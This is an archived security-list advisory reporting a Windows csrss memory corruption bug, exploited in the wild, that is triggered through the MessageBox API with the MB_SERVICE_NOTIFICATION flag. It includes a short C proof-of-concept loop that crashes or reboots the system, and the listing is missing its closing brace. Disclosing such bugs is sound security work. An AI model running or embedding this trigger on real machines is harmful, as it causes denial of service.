Computer Security
[EN] no-pyccku

Related information

  Microsoft Windows memory corruption

  EEYE: Windows Vista CSRSS Dangling Process Pointer Privilege Escalation

  Microsoft Security Bulletin MS07-021 Vulnerabilities in CSRSS Could Allow Remote Code Execution (930178)

  csrss.exe double-free vulnerability - arbitrary DWORD overwrite exploit

  ms ;)

From:3APA3A <3APA3A_(at)>
Subject:Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Dear [email protected],

 On  one  of  Russian  forum  security  vulnerability  is  discussed in
 Microsoft Windows (Windows XP is tested). A vulnerability is caused by
 memory  corruption  is  string  beginning  with  "\?\" is send thorugh
 MessageBox  API  with MB_SERVICE_NOTIFICATION flag. It looks like some
 "debug"  feature  not  cleaned  out  in  final release and it seems to
 exploitable to code execution at kernel level. Code example below:

#include <stdio.h>
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
 MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);

System hangs, crashes (BSOD) or reboots.

       { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod